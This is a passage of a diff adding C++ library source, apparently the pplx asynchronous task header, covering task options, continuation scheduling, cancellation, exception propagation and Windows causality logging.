_M_ContinuationContext(task_continuation_context::use_default()) + , _M_HasCancellationToken(true) + , _M_HasScheduler(false) + { + } + + /// + /// Task option that specify a continuation context. This is valid only for continuations (then) + /// + task_options(task_continuation_context _ContinuationContext) + : _M_Scheduler(get_ambient_scheduler()) + , _M_CancellationToken(cancellation_token::none()) + , _M_ContinuationContext(_ContinuationContext) + , _M_HasCancellationToken(false) + , _M_HasScheduler(false) + { + } + + /// + /// Task option that specify a cancellation token and a continuation context. This is valid only for + /// continuations (then) + /// + task_options(cancellation_token _Token, task_continuation_context _ContinuationContext) + : _M_Scheduler(get_ambient_scheduler()) + , _M_CancellationToken(_Token) + , _M_ContinuationContext(_ContinuationContext) + , _M_HasCancellationToken(false) + , _M_HasScheduler(false) + { + } + + /// + /// Task option that specify a scheduler with shared lifetime + /// + template + task_options(std::shared_ptr<_SchedType> _Scheduler) + : _M_Scheduler(std::move(_Scheduler)) + , _M_CancellationToken(cancellation_token::none()) + , _M_ContinuationContext(task_continuation_context::use_default()) + , _M_HasCancellationToken(false) + , _M_HasScheduler(true) + { + } + + /// + /// Task option that specify a scheduler reference + /// + task_options(scheduler_interface& _Scheduler) + : _M_Scheduler(&_Scheduler) + , _M_CancellationToken(cancellation_token::none()) + , _M_ContinuationContext(task_continuation_context::use_default()) + , _M_HasCancellationToken(false) + , _M_HasScheduler(true) + { + } + + /// + /// Task option that specify a scheduler + /// + task_options(scheduler_ptr _Scheduler) + : _M_Scheduler(std::move(_Scheduler)) + , _M_CancellationToken(cancellation_token::none()) + , _M_ContinuationContext(task_continuation_context::use_default()) + , _M_HasCancellationToken(false) + , _M_HasScheduler(true) + { + } + + /// + /// Task option copy constructor + /// + task_options(const task_options& _TaskOptions) + : _M_Scheduler(_TaskOptions.get_scheduler()) + , _M_CancellationToken(_TaskOptions.get_cancellation_token()) + , _M_ContinuationContext(_TaskOptions.get_continuation_context()) + , _M_HasCancellationToken(_TaskOptions.has_cancellation_token()) + , _M_HasScheduler(_TaskOptions.has_scheduler()) + { + } + + /// + /// Sets the given token in the options + /// + void set_cancellation_token(cancellation_token _Token) + { + _M_CancellationToken = _Token; + _M_HasCancellationToken = true; + } + + /// + /// Sets the given continuation context in the options + /// + void set_continuation_context(task_continuation_context _ContinuationContext) + { + _M_ContinuationContext = _ContinuationContext; + } + + /// + /// Indicates whether a cancellation token was specified by the user + /// + bool has_cancellation_token() const { return _M_HasCancellationToken; } + + /// + /// Returns the cancellation token + /// + cancellation_token get_cancellation_token() const { return _M_CancellationToken; } + + /// + /// Returns the continuation context + /// + task_continuation_context get_continuation_context() const { return _M_ContinuationContext; } + + /// + /// Indicates whether a scheduler n was specified by the user + /// + bool has_scheduler() const { return _M_HasScheduler; } + + /// + /// Returns the scheduler + /// + scheduler_ptr get_scheduler() const { return _M_Scheduler; } + +private: + task_options const& operator=(task_options const& _Right); + friend details::_Internal_task_options& details::_get_internal_task_options(task_options&); + friend const details::_Internal_task_options& details::_get_internal_task_options(const task_options&); + + scheduler_ptr _M_Scheduler; + cancellation_token _M_CancellationToken; + task_continuation_context _M_ContinuationContext; + details::_Internal_task_options _M_InternalTaskOptions; + bool _M_HasCancellationToken; + bool _M_HasScheduler; +}; + +namespace details +{ +inline _Internal_task_options& _get_internal_task_options(task_options& options) +{ + return options._M_InternalTaskOptions; +} +inline const _Internal_task_options& _get_internal_task_options(const task_options& options) +{ + return options._M_InternalTaskOptions; +} + +struct _Task_impl_base; +template +struct _Task_impl; + +template +struct _Task_ptr +{ + typedef std::shared_ptr<_Task_impl<_ReturnType>> _Type; + static _Type _Make(_CancellationTokenState* _Ct, scheduler_ptr _Scheduler_arg) + { + return std::make_shared<_Task_impl<_ReturnType>>(_Ct, _Scheduler_arg); + } +}; + +typedef _TaskCollection_t::_TaskProcHandle_t _UnrealizedChore_t; +typedef std::shared_ptr<_Task_impl_base> _Task_ptr_base; + +// The weak-typed base task handler for continuation tasks. +struct _ContinuationTaskHandleBase : _UnrealizedChore_t +{ + _ContinuationTaskHandleBase* _M_next; + task_continuation_context _M_continuationContext; + bool _M_isTaskBasedContinuation; + + // This field gives inlining scheduling policy for current chore. + _TaskInliningMode_t _M_inliningMode; + + virtual _Task_ptr_base _GetTaskImplBase() const = 0; + + _ContinuationTaskHandleBase() + : _M_next(nullptr) + , _M_continuationContext(task_continuation_context::use_default()) + , _M_isTaskBasedContinuation(false) + , _M_inliningMode(details::_NoInline) + { + } + + virtual ~_ContinuationTaskHandleBase() {} +}; + +#if PPLX_TASK_ASYNC_LOGGING +// GUID used for identifying causality logs from PPLTask +const ::Platform::Guid _PPLTaskCausalityPlatformID( + 0x7A76B220, 0xA758, 0x4E6E, 0xB0, 0xE0, 0xD7, 0xC6, 0xD7, 0x4A, 0x88, 0xFE); + +__declspec(selectany) volatile long _isCausalitySupported = 0; + +inline bool _IsCausalitySupported() +{ +#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) + if (_isCausalitySupported == 0) + { + long _causality = 1; + OSVERSIONINFOEX _osvi = {}; + _osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); + + // The Causality is supported on Windows version higher than Windows 8 + _osvi.dwMajorVersion = 6; + _osvi.dwMinorVersion = 3; + + DWORDLONG _conditionMask = 0; + VER_SET_CONDITION(_conditionMask, VER_MAJORVERSION, VER_GREATER_EQUAL); + VER_SET_CONDITION(_conditionMask, VER_MINORVERSION, VER_GREATER_EQUAL); + + if (::VerifyVersionInfo(&_osvi, VER_MAJORVERSION | VER_MINORVERSION, _conditionMask)) + { + _causality = 2; + } + + _isCausalitySupported = _causality; + return _causality == 2; + } + + return _isCausalitySupported == 2 ? true : false; +#else + return true; +#endif +} + +// Stateful logger rests inside task_impl_base. +struct _TaskEventLogger +{ + _Task_impl_base* _M_task; + bool _M_scheduled; + bool _M_taskPostEventStarted; + + // Log before scheduling task + void _LogScheduleTask(bool _isContinuation) + { + if (details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceOperationCreation( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + _PPLTaskCausalityPlatformID, + reinterpret_cast(_M_task), + _isContinuation ? "pplx::PPLTask::ScheduleContinuationTask" : "pplx::PPLTask::ScheduleTask", + 0); + _M_scheduled = true; + } + } + + // It will log the cancel event but not canceled state. _LogTaskCompleted will log the terminal state, which + // includes cancel state. + void _LogCancelTask() + { + if (details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceOperationRelation( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Important, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + _PPLTaskCausalityPlatformID, + reinterpret_cast(_M_task), + ::Windows::Foundation::Diagnostics::CausalityRelation::Cancel); + } + } + + // Log when task reaches terminal state. Note: the task can reach a terminal state (by cancellation or exception) + // without having run + void _LogTaskCompleted(); + + // Log when task body (which includes user lambda and other scheduling code) begin to run + void _LogTaskExecutionStarted() {} + + // Log when task body finish executing + void _LogTaskExecutionCompleted() + { + if (_M_taskPostEventStarted && details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceSynchronousWorkCompletion( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + ::Windows::Foundation::Diagnostics::CausalitySynchronousWork::CompletionNotification); + } + } + + // Log right before user lambda being invoked + void _LogWorkItemStarted() + { + if (details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceSynchronousWorkStart( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + _PPLTaskCausalityPlatformID, + reinterpret_cast(_M_task), + ::Windows::Foundation::Diagnostics::CausalitySynchronousWork::Execution); + } + } + + // Log right after user lambda being invoked + void _LogWorkItemCompleted() + { + if (details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceSynchronousWorkCompletion( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + ::Windows::Foundation::Diagnostics::CausalitySynchronousWork::Execution); + + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceSynchronousWorkStart( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + _PPLTaskCausalityPlatformID, + reinterpret_cast(_M_task), + ::Windows::Foundation::Diagnostics::CausalitySynchronousWork::CompletionNotification); + _M_taskPostEventStarted = true; + } + } + + _TaskEventLogger(_Task_impl_base* _task) : _M_task(_task) + { + _M_scheduled = false; + _M_taskPostEventStarted = false; + } +}; + +// Exception safe logger for user lambda +struct _TaskWorkItemRAIILogger +{ + _TaskEventLogger& _M_logger; + _TaskWorkItemRAIILogger(_TaskEventLogger& _taskHandleLogger) : _M_logger(_taskHandleLogger) + { + _M_logger._LogWorkItemStarted(); + } + + ~_TaskWorkItemRAIILogger() { _M_logger._LogWorkItemCompleted(); } + _TaskWorkItemRAIILogger& operator=(const _TaskWorkItemRAIILogger&); // cannot be assigned +}; + +#else +inline void _LogCancelTask(_Task_impl_base*) {} +struct _TaskEventLogger +{ + void _LogScheduleTask(bool) {} + void _LogCancelTask() {} + void _LogWorkItemStarted() {} + void _LogWorkItemCompleted() {} + void _LogTaskExecutionStarted() {} + void _LogTaskExecutionCompleted() {} + void _LogTaskCompleted() {} + _TaskEventLogger(_Task_impl_base*) {} +}; +struct _TaskWorkItemRAIILogger +{ + _TaskWorkItemRAIILogger(_TaskEventLogger&) {} +}; +#endif + +/// +/// The _PPLTaskHandle is the strong-typed task handle base. All user task functions need to be wrapped in this task +/// handler to be executable by PPL. By deriving from a different _BaseTaskHandle, it can be used for both initial +/// tasks and continuation tasks. For initial tasks, _PPLTaskHandle will be derived from _UnrealizedChore_t, and for +/// continuation tasks, it will be derived from _ContinuationTaskHandleBase. The life time of the _PPLTaskHandle +/// object is be managed by runtime if task handle is scheduled. +/// +/// +/// The result type of the _Task_impl. +/// +/// +/// The derived task handle class. The operator () needs to be implemented. +/// +/// +/// The base class from which _PPLTaskHandle should be derived. This is either _UnrealizedChore_t or +/// _ContinuationTaskHandleBase. +/// +template +struct _PPLTaskHandle : _BaseTaskHandle +{ + _PPLTaskHandle(const typename _Task_ptr<_ReturnType>::_Type& _PTask) : _M_pTask(_PTask) {} + + virtual ~_PPLTaskHandle() + { + // Here is the sink of all task completion code paths + _M_pTask->_M_taskEventLogger._LogTaskCompleted(); + } + + virtual void invoke() const + { + // All exceptions should be rethrown to finish cleanup of the task collection. They will be caught and handled + // by the runtime. + _ASSERTE((bool)_M_pTask); + if (!_M_pTask->_TransitionedToStarted()) + { + static_cast(this)->_SyncCancelAndPropagateException(); + return; + } + + _M_pTask->_M_taskEventLogger._LogTaskExecutionStarted(); + try + { + // All derived task handle must implement this contract function. + static_cast(this)->_Perform(); + } + catch (const task_canceled&) + { + _M_pTask->_Cancel(true); + } + catch (const _Interruption_exception&) + { + _M_pTask->_Cancel(true); + } +#if defined(__cplusplus_winrt) + catch (::Platform::Exception ^ _E) + { + _M_pTask->_CancelWithException(_E); + } +#endif /* defined (__cplusplus_winrt) */ + catch (...) + { + _M_pTask->_CancelWithException(std::current_exception()); + } + _M_pTask->_M_taskEventLogger._LogTaskExecutionCompleted(); + } + + // Cast _M_pTask pointer to "type-less" _Task_impl_base pointer, which can be used in _ContinuationTaskHandleBase. + // The return value should be automatically optimized by R-value ref. + _Task_ptr_base _GetTaskImplBase() const { return _M_pTask; } + + typename _Task_ptr<_ReturnType>::_Type _M_pTask; + +private: + _PPLTaskHandle const& operator=(_PPLTaskHandle const&); // no assignment operator +}; + +/// +/// The base implementation of a first-class task. This class contains all the non-type specific +/// implementation details of the task. +/// +/**/ +struct _Task_impl_base +{ + enum _TaskInternalState + { + // Tracks the state of the task, rather than the task collection on which the task is scheduled + _Created, + _Started, + _PendingCancel, + _Completed, + _Canceled + }; +// _M_taskEventLogger - 'this' : used in base member initializer list +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable : 4355) +#endif + _Task_impl_base(_CancellationTokenState* _PTokenState, scheduler_ptr _Scheduler_arg) + : _M_TaskState(_Created) + , _M_fFromAsync(false) + , _M_fUnwrappedTask(false) + , _M_pRegistration(nullptr) + , _M_Continuations(nullptr) + , _M_TaskCollection(_Scheduler_arg) + , _M_taskEventLogger(this) + { + // Set cancellation token + _M_pTokenState = _PTokenState; + _ASSERTE(_M_pTokenState != nullptr); + if (_M_pTokenState != _CancellationTokenState::_None()) _M_pTokenState->_Reference(); + } +#if defined(_MSC_VER) +#pragma warning(pop) +#endif + + virtual ~_Task_impl_base() + { + _ASSERTE(_M_pTokenState != nullptr); + if (_M_pTokenState != _CancellationTokenState::_None()) + { + _M_pTokenState->_Release(); + } + } + + task_status _Wait() + { + bool _DoWait = true; + +#if defined(__cplusplus_winrt) + if (_IsNonBlockingThread()) + { + // In order to prevent Windows Runtime STA threads from blocking the UI, calling task.wait() task.get() is + // illegal if task has not been completed. + if (!_IsCompleted() && !_IsCanceled()) + { + throw invalid_operation("Illegal to wait on a task in a Windows Runtime STA"); + } + else + { + // Task Continuations are 'scheduled' *inside* the chore that is executing on the ancestors's task + // group. If a continuation needs to be marshaled to a different apartment, instead of scheduling, we + // make a synchronous cross apartment COM call to execute the continuation. If it then happens to do + // something which waits on the ancestor (say it calls .get(), which task based continuations are wont + // to do), waiting on the task group results in on the chore that is making this synchronous callback, + // which causes a deadlock. To avoid this, we test the state ancestor's event , and we will NOT wait on + // if it has finished execution (which means now we are on the inline synchronous callback). + _DoWait = false; + } + } +#endif /* defined (__cplusplus_winrt) */ + if (_DoWait) + { + // If this task was created from a Windows Runtime async operation, do not attempt to inline it. The + // async operation will take place on a thread in the appropriate apartment Simply wait for the completed + // event to be set. + if (_M_fFromAsync) + { + _M_TaskCollection._Wait(); + } + else + { + // Wait on the task collection to complete. The task collection is guaranteed to still be + // valid since the task must be still within scope so that the _Task_impl_base destructor + // has not yet been called. This call to _Wait potentially inlines execution of work. + try + { + // Invoking wait on a task collection resets the state of the task collection. This means that + // if the task collection itself were canceled, or had encountered an exception, only the first + // call to wait will receive this status. However, both cancellation and exceptions flowing through + // tasks set state in the task impl itself. + + // When it returns canceled, either work chore or the cancel thread should already have set task's + // state properly -- canceled state or completed state (because there was no interruption point). + // For tasks with unwrapped tasks, we should not change the state of current task, since the + // unwrapped task are still running. + _M_TaskCollection._RunAndWait(); + } + catch (details::_Interruption_exception&) + { + // The _TaskCollection will never be an interruption point since it has a none token. + _ASSERTE(false); + } + catch (task_canceled&) + { + // task_canceled is a special exception thrown by cancel_current_task. The spec states that + // cancel_current_task must be called from code that is executed within the task (throwing it from + // parallel work created by and waited upon by the task is acceptable). We can safely assume that + // the task wrapper _PPLTaskHandle::operator() has seen the exception and canceled the task. Swallow + // the exception here. + _ASSERTE(_IsCanceled()); + } +#if defined(__cplusplus_winrt) + catch (::Platform::Exception ^ _E) + { + // Its possible the task body hasn't seen the exception, if so we need to cancel with exception + // here. + if (!_HasUserException()) + { + _CancelWithException(_E); + } + // Rethrow will mark the exception as observed. + _M_exceptionHolder->_RethrowUserException(); + } +#endif /* defined (__cplusplus_winrt) */ + catch (...) + { + // Its possible the task body hasn't seen the exception, if so we need to cancel with exception + // here. + if (!_HasUserException()) + { + _CancelWithException(std::current_exception()); + } + // Rethrow will mark the exception as observed. + _M_exceptionHolder->_RethrowUserException(); + } + + // If the lambda body for this task (executed or waited upon in _RunAndWait above) happened to return a + // task which is to be unwrapped and plumbed to the output of this task, we must not only wait on the + // lambda body, we must wait on the **INNER** body. It is in theory possible that we could inline such + // if we plumb a series of things through; however, this takes the tact of simply waiting upon the + // completion signal. + if (_M_fUnwrappedTask) + { + _M_TaskCollection._Wait(); + } + } + } + + if (_HasUserException()) + { + _M_exceptionHolder->_RethrowUserException(); + } + else if (_IsCanceled()) + { + return canceled; + } + _ASSERTE(_IsCompleted()); + return completed; + } + + /// + /// Requests cancellation on the task and schedules continuations if the task can be transitioned to a terminal + /// state. + /// + /// + /// Set to true if the cancel takes place as a result of the task body encountering an exception, or because an + /// ancestor or task_completion_event the task was registered with were canceled with an exception. A + /// synchronous cancel is one that assures the task could not be running on a different thread at the time the + /// cancellation is in progress. An asynchronous cancel is one where the thread performing the cancel has no + /// control over the thread that could be executing the task, that is the task could execute concurrently while + /// the cancellation is in progress. + /// + /// + /// Whether an exception other than the internal runtime cancellation exceptions caused this cancellation. + /// + /// + /// Whether this exception came from an ancestor task or a task_completion_event as opposed to an exception that + /// was encountered by the task itself. Only valid when _UserException is set to true. + /// + /// + /// The exception holder that represents the exception. Only valid when _UserException is set to true. + /// + virtual bool _CancelAndRunContinuations(bool _SynchronousCancel, + bool _UserException, + bool _PropagatedFromAncestor, + const std::shared_ptr<_ExceptionHolder>& _ExHolder) = 0; + + bool _Cancel(bool _SynchronousCancel) + { + // Send in a dummy value for exception. It is not used when the first parameter is false. + return _CancelAndRunContinuations(_SynchronousCancel, false, false, _M_exceptionHolder); + } + + bool _CancelWithExceptionHolder(const std::shared_ptr<_ExceptionHolder>& _ExHolder, bool _PropagatedFromAncestor) + { + // This task was canceled because an ancestor task encountered an exception. + return _CancelAndRunContinuations(true, true, _PropagatedFromAncestor, _ExHolder); + } + +#if defined(__cplusplus_winrt) + bool _CancelWithException(::Platform::Exception ^ _Exception) + { + // This task was canceled because the task body encountered an exception. + _ASSERTE(!_HasUserException()); + return _CancelAndRunContinuations( + true, true, false, std::make_shared<_ExceptionHolder>(_Exception, _GetTaskCreationCallstack())); + } +#endif /* defined (__cplusplus_winrt) */ + + bool _CancelWithException(const std::exception_ptr& _Exception) + { + // This task was canceled because the task body encountered an exception. + _ASSERTE(!_HasUserException()); + return _CancelAndRunContinuations( + true, true, false, std::make_shared<_ExceptionHolder>(_Exception, _GetTaskCreationCallstack())); + } + + void _RegisterCancellation(std::weak_ptr<_Task_impl_base> _WeakPtr) + { + _ASSERTE(details::_CancellationTokenState::_IsValid(_M_pTokenState)); + + auto _CancellationCallback = [_WeakPtr]() { + // Taking ownership of the task prevents dead lock during destruction + // if the destructor waits for the cancellations to be finished + auto _task = _WeakPtr.lock(); + if (_task != nullptr) _task->_Cancel(false); + }; + + _M_pRegistration = + new details::_CancellationTokenCallback(_CancellationCallback); + _M_pTokenState->_RegisterCallback(_M_pRegistration); + } + + void _DeregisterCancellation() + { + if (_M_pRegistration != nullptr) + { + _M_pTokenState->_DeregisterCallback(_M_pRegistration); + _M_pRegistration->_Release(); + _M_pRegistration = nullptr; + } + } + + bool _IsCreated() { return (_M_TaskState == _Created); } + + bool _IsStarted() { return (_M_TaskState == _Started); } + + bool _IsPendingCancel() { return (_M_TaskState == _PendingCancel); } + + bool _IsCompleted() { return (_M_TaskState == _Completed); } + + bool _IsCanceled() { return (_M_TaskState == _Canceled); } + + bool _HasUserException() { return static_cast(_M_exceptionHolder); } + + const std::shared_ptr<_ExceptionHolder>& _GetExceptionHolder() + { + _ASSERTE(_HasUserException()); + return _M_exceptionHolder; + } + + bool _IsApartmentAware() { return _M_fFromAsync; } + + void _SetAsync(bool _Async = true) { _M_fFromAsync = _Async; } + + _TaskCreationCallstack _GetTaskCreationCallstack() { return _M_pTaskCreationCallstack; } + + void _SetTaskCreationCallstack(const _TaskCreationCallstack& _Callstack) { _M_pTaskCreationCallstack = _Callstack; } + + /// + /// Helper function to schedule the task on the Task Collection. + /// + /// + /// The task chore handle that need to be executed. + /// + /// + /// The inlining scheduling policy for current _PTaskHandle. + /// + void _ScheduleTask(_UnrealizedChore_t* _PTaskHandle, _TaskInliningMode_t _InliningMode) + { + try + { + _M_TaskCollection._ScheduleTask(_PTaskHandle, _InliningMode); + } + catch (const task_canceled&) + { + // task_canceled is a special exception thrown by cancel_current_task. The spec states that + // cancel_current_task must be called from code that is executed within the task (throwing it from parallel + // work created by and waited upon by the task is acceptable). We can safely assume that the task wrapper + // _PPLTaskHandle::operator() has seen the exception and canceled the task. Swallow the exception here. + _ASSERTE(_IsCanceled()); + } + catch (const _Interruption_exception&) + { + // The _TaskCollection will never be an interruption point since it has a none token. + _ASSERTE(false); + } + catch (...) + { + // The exception could have come from two places: + // 1. From the chore body, so it already should have been caught and canceled. + // In this case swallow the exception. + // 2. From trying to actually schedule the task on the scheduler. + // In this case cancel the task with the current exception, otherwise the + // task will never be signaled leading to deadlock when waiting on the task. + if (!_HasUserException()) + { + _CancelWithException(std::current_exception()); + } + } + } + + /// + /// Function executes a continuation. This function is recorded by a parent task implementation + /// when a continuation is created in order to execute later. + /// + /// + /// The continuation task chore handle that need to be executed. + /// + /**/ + void _RunContinuation(_ContinuationTaskHandleBase* _PTaskHandle) + { + _Task_ptr_base _ImplBase = _PTaskHandle->_GetTaskImplBase(); + if (_IsCanceled() && !_PTaskHandle->_M_isTaskBasedContinuation) + { + if (_HasUserException()) + { + // If the ancestor encountered an exception, transfer the exception to the continuation + // This traverses down the tree to propagate the exception. + _ImplBase->_CancelWithExceptionHolder(_GetExceptionHolder(), true); + } + else + { + // If the ancestor was canceled, then your own execution should be canceled. + // This traverses down the tree to cancel it. + _ImplBase->_Cancel(true); + } + } + else + { + // This can only run when the ancestor has completed or it's a task based continuation that fires when a + // task is canceled (with or without a user exception). + _ASSERTE(_IsCompleted() || _PTaskHandle->_M_isTaskBasedContinuation); + _ASSERTE(!_ImplBase->_IsCanceled()); + return _ImplBase->_ScheduleContinuationTask(_PTaskHandle); + } + + // If the handle is not scheduled, we need to manually delete it. + delete _PTaskHandle; + } + + // Schedule a continuation to run + void _ScheduleContinuationTask(_ContinuationTaskHandleBase* _PTaskHandle) + { + _M_taskEventLogger._LogScheduleTask(true); + // Ensure that the continuation runs in proper context (this might be on a Concurrency Runtime thread or in a + // different Windows Runtime apartment) + if (_PTaskHandle->_M_continuationContext._HasCapturedContext()) + { + // For those continuations need to be scheduled inside captured context, we will try to apply automatic + // inlining to their inline modes, if they haven't been specified as _ForceInline yet. This change will + // encourage those continuations to be executed inline so that reduce the cost of marshaling. For normal + // continuations we won't do any change here, and their inline policies are completely decided by ._ThenImpl + // method. + if (_PTaskHandle->_M_inliningMode != details::_ForceInline) + { + _PTaskHandle->_M_inliningMode = details::_DefaultAutoInline; + } + _ScheduleFuncWithAutoInline( + [_PTaskHandle]() { + // Note that we cannot directly capture "this" pointer, instead, we should use _TaskImplPtr, a + // shared_ptr to the _Task_impl_base. Because "this" pointer will be invalid as soon as _PTaskHandle + // get deleted. _PTaskHandle will be deleted after being scheduled. + auto _TaskImplPtr = _PTaskHandle->_GetTaskImplBase(); + if (details::_ContextCallback::_CaptureCurrent() == _PTaskHandle->_M_continuationContext) + { + _TaskImplPtr->_ScheduleTask(_PTaskHandle, details::_ForceInline); + } + else + { + // + // It's entirely possible that the attempt to marshal the call into a differing context will + // fail. In this case, we need to handle the exception and mark the continuation as canceled + // with the appropriate exception. There is one slight hitch to this: + // + // NOTE: COM's legacy behavior is to swallow SEH exceptions and marshal them back as HRESULTS. + // This will in effect turn an SEH into a C++ exception that gets tagged on the task. One + // unfortunate result of this is that various pieces of the task infrastructure will not be in a + // valid state after this in /EHsc (due to the lack of destructors running, etc...). + // + try + { + // Dev10 compiler needs this! + auto _PTaskHandle1 = _PTaskHandle; + _PTaskHandle->_M_continuationContext._CallInContext([_PTaskHandle1, _TaskImplPtr]() { + _TaskImplPtr->_ScheduleTask(_PTaskHandle1, details::_ForceInline); + }); + } +#if defined(__cplusplus_winrt) + catch (::Platform::Exception ^ _E) + { + _TaskImplPtr->_CancelWithException(_E); + } +#endif /* defined (__cplusplus_winrt) */ + catch (...) + { + _TaskImplPtr->_CancelWithException(std::current_exception()); + } + } + }, + _PTaskHandle->_M_inliningMode); + } + else + { + _ScheduleTask(_PTaskHandle, _PTaskHandle->_M_inliningMode); + } + } + + /// + /// Schedule the actual continuation. This will either schedule the function on the continuation task's + /// implementation if the task has completed or append it to a list of functions to execute when the task + /// actually does complete. + /// + /// + /// The input type of the task. + /// + /// + /// The output type of the task. + /// + /**/ + void _ScheduleContinuation(_ContinuationTaskHandleBase* _PTaskHandle) + { + enum + { + _Nothing, + _Schedule, + _Cancel, + _CancelWithException + } _Do = _Nothing; + + // If the task has canceled, cancel the continuation. If the task has completed, execute the continuation right + // away. Otherwise, add it to the list of pending continuations + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_ContinuationsCritSec); + if (_IsCompleted() || (_IsCanceled() && _PTaskHandle->_M_isTaskBasedContinuation)) + { + _Do = _Schedule; + } + else if (_IsCanceled()) + { + if (_HasUserException()) + { + _Do = _CancelWithException; + } + else + { + _Do = _Cancel; + } + } + else + { + // chain itself on the continuation chain. + _PTaskHandle->_M_next = _M_Continuations; + _M_Continuations = _PTaskHandle; + } + } + + // Cancellation and execution of continuations should be performed after releasing the lock. Continuations off + // of async tasks may execute inline. + switch (_Do) + { + case _Schedule: + { + _PTaskHandle->_GetTaskImplBase()->_ScheduleContinuationTask(_PTaskHandle); + break; + } + case _Cancel: + { + // If the ancestor was canceled, then your own execution should be canceled. + // This traverses down the tree to cancel it. + _PTaskHandle->_GetTaskImplBase()->_Cancel(true); + + delete _PTaskHandle; + break; + } + case _CancelWithException: + { + // If the ancestor encountered an exception, transfer the exception to the continuation + // This traverses down the tree to propagate the exception. + _PTaskHandle->_GetTaskImplBase()->_CancelWithExceptionHolder(_GetExceptionHolder(), true); + + delete _PTaskHandle; + break; + } + case _Nothing: + default: + // In this case, we have inserted continuation to continuation chain, + // nothing more need to be done, just leave. + break; + } + } + + void _RunTaskContinuations() + { + // The link list can no longer be modified at this point, + // since all following up continuations will be scheduled by themselves. + _ContinuationList _Cur = _M_Continuations, _Next; + _M_Continuations = nullptr; + while (_Cur) + { + // Current node might be deleted after running, + // so we must fetch the next first. + _Next = _Cur->_M_next; + _RunContinuation(_Cur); + _Cur = _Next; + } + } + +#if defined(__cplusplus_winrt) + static bool _IsNonBlockingThread() + { + APTTYPE _AptType; + APTTYPEQUALIFIER _AptTypeQualifier; + + HRESULT hr = CoGetApartmentType(&_AptType, &_AptTypeQualifier); + // + // If it failed, it's not a Windows Runtime/COM initialized thread. This is not a failure. + // + if (SUCCEEDED(hr)) + { + switch (_AptType) + { + case APTTYPE_STA: + case APTTYPE_MAINSTA: return true; break; + case APTTYPE_NA: + switch (_AptTypeQualifier) + { + // A thread executing in a neutral apartment is either STA or MTA. To find out if this thread is + // allowed to wait, we check the app qualifier. If it is an STA thread executing in a neutral + // apartment, waiting is illegal, because the thread is responsible for pumping messages and + // waiting on a task could take the thread out of circulation for a while. + case APTTYPEQUALIFIER_NA_ON_STA: + case APTTYPEQUALIFIER_NA_ON_MAINSTA: return true; break; + } + break; + } + } + +#if _UITHREADCTXT_SUPPORT + // This method is used to throw an exception in _Wait() if called within STA. We + // want the same behavior if _Wait is called on the UI thread. + if (SUCCEEDED(CaptureUiThreadContext(nullptr))) + { + return true; + } +#endif /* _UITHREADCTXT_SUPPORT */ + + return false; + } + + template + static void _AsyncInit( + const typename _Task_ptr<_ReturnType>::_Type& _OuterTask, + Windows::Foundation::IAsyncOperation::_Value> ^ _AsyncOp) + { + // This method is invoked either when a task is created from an existing async operation or + // when a lambda that creates an async operation executes. + + // If the outer task is pending cancel, cancel the async operation before setting the completed handler. The COM + // reference on the IAsyncInfo object will be released when all ^references to the operation go out of scope. + + // This assertion uses the existence of taskcollection to determine if the task was created from an event. + // That is no longer valid as even tasks created from a user lambda could have no underlying taskcollection + // when a custom scheduler is used. + // _ASSERTE((!_OuterTask->_M_TaskCollection._IsCreated() || _OuterTask->_M_fUnwrappedTask) && + // !_OuterTask->_IsCanceled()); + + // Pass the shared_ptr by value into the lambda instead of using 'this'. + _AsyncOp->Completed = ref new Windows::Foundation::AsyncOperationCompletedHandler<_ReturnType>( + [_OuterTask]( + Windows::Foundation::IAsyncOperation::_Value> ^ + _Operation, + Windows::Foundation::AsyncStatus _Status) mutable { + if (_Status == Windows::Foundation::AsyncStatus::Canceled) + { + _OuterTask->_Cancel(true); + } + else if (_Status == Windows::Foundation::AsyncStatus::Error) + { + _OuterTask->_CancelWithException( + ::Platform::Exception::ReCreateException(static_cast(_Operation->ErrorCode.Value))); + } + else + { + _ASSERTE(_Status == Windows::Foundation::AsyncStatus::Completed); + _OuterTask->_FinalizeAndRunContinuations(_Operation->GetResults()); + } + + // Take away this shared pointers reference on the task instead of waiting for the delegate to be + // released. It could be released on a different thread after a delay, and not releasing the reference + // here could cause the tasks to hold on to resources longer than they should. As an example, without + // this reset, writing to a file followed by reading from it using the Windows Runtime Async APIs causes + // a sharing violation. Using const_cast is the workaround for failed mutable keywords + const_cast<_Task_ptr<_ReturnType>::_Type&>(_OuterTask).reset(); + }); + _OuterTask->_SetUnwrappedAsyncOp(_AsyncOp); + } +#endif /* defined (__cplusplus_winrt) */ + + template + static void _AsyncInit(const typename _Task_ptr<_ReturnType>::_Type& _OuterTask, + const task<_InternalReturnType>& _UnwrappedTask) + { + _ASSERTE(_OuterTask->_M_fUnwrappedTask && !_OuterTask->_IsCanceled()); + + // + // We must ensure that continuations off _OuterTask (especially exception handling ones) continue to function in + // the presence of an exception flowing out of the inner task _UnwrappedTask. This requires an exception + // handling continuation off the inner task which does the appropriate funneling to the outer one. We use _Then + // instead of then to prevent the exception from being marked as observed by our internal continuation. This + // continuation must be scheduled regardless of whether or not the _OuterTask task is canceled. + // + _UnwrappedTask._Then( + 